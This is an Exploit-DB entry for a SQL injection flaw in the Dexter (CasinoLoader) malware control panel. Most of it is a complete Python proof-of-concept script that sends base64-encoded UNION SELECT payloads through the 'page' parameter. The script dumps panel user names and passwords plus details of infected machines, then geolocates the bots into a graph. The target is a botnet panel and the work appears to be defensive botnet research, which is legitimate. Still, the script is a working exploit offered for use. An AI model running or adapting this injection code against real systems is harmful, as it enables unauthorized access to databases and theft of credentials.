header-logo
Suggest Exploit
vendor:
CasinoLoader
by:
Brian Wallace
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CasinoLoader
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:dexter:casinoloader
Metasploit:
Other Scripts:
Platforms Tested: Windows 7, Ubuntu, Debian
2014

Dexter (CasinoLoader) Panel SQLi

This exploit allows an attacker to execute arbitrary SQL queries in the Dexter (CasinoLoader) Panel. By manipulating the 'page' parameter, an attacker can inject SQL code to retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly validated and sanitized before being used in SQL queries. Use parameterized queries or prepared statements to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Dexter (CasinoLoader) Panel SQLi
# Date: Feb, 13, 2014
# Exploit Author: Brian Wallace (@botnet_hunter)
# Version: CasinoLoader
# Tested on: Windows 7, Ubuntu, Debian
import pycurl
import urllib
import cStringIO
import base64
import argparse
import sys
import string
import pygeoip

version = "0.1-http_bots-PoC"


def PrintHelp():
    global version
    print "usage: dexter.PoC.py [-h] [action] [gateway url]"
    print ""
    print "Dexter CasinoLoader BAMF PoC v" + version
    print "Exploiting CasinoLoader panels for information"
    print "By Brian Wallace (@botnet_hunter)"
    print ""
    print "arguments:"
    print "  action        Actions to be taken against the botnet (default: dump)"
    print "                dump - Print configuration information obtained from source file"
    print "                drop - Execute a command to make the bot scripts exit"
    print "  source        Path to non-obfuscated source code for the target bot (default: stdin)"
    print ""
    print("GPS:")
    print("  -m MaxMind Location           Location of Maxmind database files (default .)")
    print ""
    print "  -h, --help    Print this message"
    print ""


class DexterPanel:
    def __init__(self, gateway_url):
        self.gateway_url = gateway_url

    @staticmethod
    def _get_field(gateway, table, column, row):
        buf = cStringIO.StringIO()
        c = pycurl.Curl()
        c.setopt(c.URL, gateway)
        page = "' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + str(row) + " -- --"
        params = urllib.urlencode({'val': 'AA==', 'page': base64.b64encode(page)})
        c.setopt(c.POSTFIELDS, params)
        c.setopt(c.HEADERFUNCTION, buf.write)
        c.perform()

        val = buf.getvalue()
        cookie = None
        for line in val.split('\n'):
            line = line.strip()
            if line.count('Set-Cookie:') > 0 and line.count("response") > 0:
                cookie = line
                cookie = cookie[cookie.find('=') + 1:]
                cookie = urllib.unquote(cookie)
                cookie = base64.b64decode(cookie)
                cookie = cookie[1:]
                cookie = cookie[:-2]
                break
        buf.close()
        return cookie

    def get_all_user_details(self):
        count = 0
        users = []
        while True:
            user = self._get_field(self.gateway_url, 'users', 'name', count)
            if user is None or user == "":
                break
            password = self._get_field(self.gateway_url, 'users', 'password', count)
            count += 1
            users.append({'user': user, 'password': password})
        return users

    def get_all_bot_details(self):
        count = 0
        bots = []
        while True:
            user = self._get_field(self.gateway_url, 'bots', 'RemoteIP', count)
            if user is None or user == "":
                break
            count += 1
            bots.append({'RemoteIP': user,
                         'UID': self._get_field(self.gateway_url, 'bots', 'UID', count),
                         'Version': self._get_field(self.gateway_url, 'bots', 'Version', count),
                         'Username': self._get_field(self.gateway_url, 'bots', 'Username', count),
                         'Computername': self._get_field(self.gateway_url, 'bots', 'Computername', count),
                         'UserAgent': self._get_field(self.gateway_url, 'bots', 'UserAgent', count),
                         'OS': self._get_field(self.gateway_url, 'bots', 'OS', count),
                         'Architecture': self._get_field(self.gateway_url, 'bots', 'Architecture', count),
                         'Idle Time': self._get_field(self.gateway_url, 'bots', 'Idle Time', count),
                         'Process List': self._get_field(self.gateway_url, 'bots', 'Process List', count),
                         'LastVisit': self._get_field(self.gateway_url, 'bots', 'LastVisit', count),
                         'LastCommand': self._get_field(self.gateway_url, 'bots', 'LastCommand', count)})
        return bots


if __name__ == "__main__":
    parser = argparse.ArgumentParser(add_help=False)
    parser.add_argument('action', nargs='?', type=str, default="dump", help="Actions to be taken against pBots (default: dump)", choices=["dump", "graph"])
    parser.add_argument('gateway', nargs='?', type=str, default=None, help="URL to Dexter bot gateway")
    parser.add_argument('-m', metavar='maxmind', type=str, nargs='?', default='./GeoLiteCity.dat')
    parser.add_argument('-h', '--help', default=False, required=False, action='store_true')

    args = parser.parse_args()

    if args.help or args.gateway is None:
        PrintHelp()
        sys.exit()

    if args.action == "dump":
        url = args.gateway
        dex = DexterPanel(url)
        print "User details: %s" % dex.get_all_user_details()
        print "Bot details: %s" % dex.get_all_bot_details()
    elif args.action == "graph":
        url = args.gateway
        dex = DexterPanel(url)
        bots = dex.get_all_bot_details()

        #load Maxmind
        sys.stderr.write('Loading MaxMind Database\n')
        gi = pygeoip.GeoIP(args.m)

        nodes = {}
        connections = []

        nodes["C2"] = {"id": 0, "label": "C2", "mod": 0}
        highestnode = 1

        #loop through all bots
        for bot in bots:
            ip = bot["RemoteIP"]
            geoip = gi.record_by_addr(ip)
            node = {"id": highestnode, "label": ip, "host": ip, "mod": 1}
            highestnode += 1
            if geoip is not None:
                node['lat'] = geoip["latitude"]
                node['lng'] = geoip["longitude"]
                nodes[ip] = node
                connections.append([node['id'], 0])

        print('<?xml version="1.0" encoding="UTF-8"?>')
        print('<gexf xmlns="http://www.gexf.net/1.2draft" version="1.2">')
        print('    <meta lastmodifieddate="2009-03-20">')
        print(('        <creator>' + "bwall" + '</creator>'))
        print('        <description></description>')
        print('    </meta>')
        print('    <graph mode="static" defaultedgetype="directed">')
        print('    <attributes class="node" mode="static">')
        print('      <attribute id="modularity_class" title="Modularity Class" type="integer"></attribute>')
        print('      <attribute id="lat" title="lat" type="double"></attribute>')
        print('      <attribute id="lng" title="lng" type="double"></attribute>')
        print('    </attributes>')
        print('        <nodes>')

        for name, node in list(nodes.items()):
            if 'lat' in node:
                print(('            <node id="' + str(node['id']) + '" label="' +
                    node['label'] + '">'))
                print('                <attvalues>')
                print(('                    <attvalue for="modularity_class" value="' +
                    str(node['mod']) + '"></attvalue>'))
                print('                     <attvalue for="lat" value="' + str(node['lat']) + '"></attvalue>')
                print('                     <attvalue for="lng" value="' + str(node['lng']) + '"></attvalue>')
                print('                </attvalues>')
                print('            </node>')
            else:
                print(('            <node id="' + str(node['id']) + '" label="' +
                    node['label'] + '">'))
                print('                <attvalues>')
                print(('                    <attvalue for="modularity_class" value="' +
                    str(node['mod']) + '"></attvalue>'))
                print('                     <attvalue for="lat" value="0"></attvalue>')
                print('                     <attvalue for="lng" value="0"></attvalue>')
                print('                </attvalues>')
                print('            </node>')
        print('        </nodes>')
        print('        <edges>')
        count = 0
        for node in connections:
            print(('            <edge id="' + str(count) + '" source="' + str(node[0]) +
                 '" target="' + str(node[1]) + '" />'))
            count += 1
        print('        </edges>')
        print('    </graph>')
        print('</gexf>')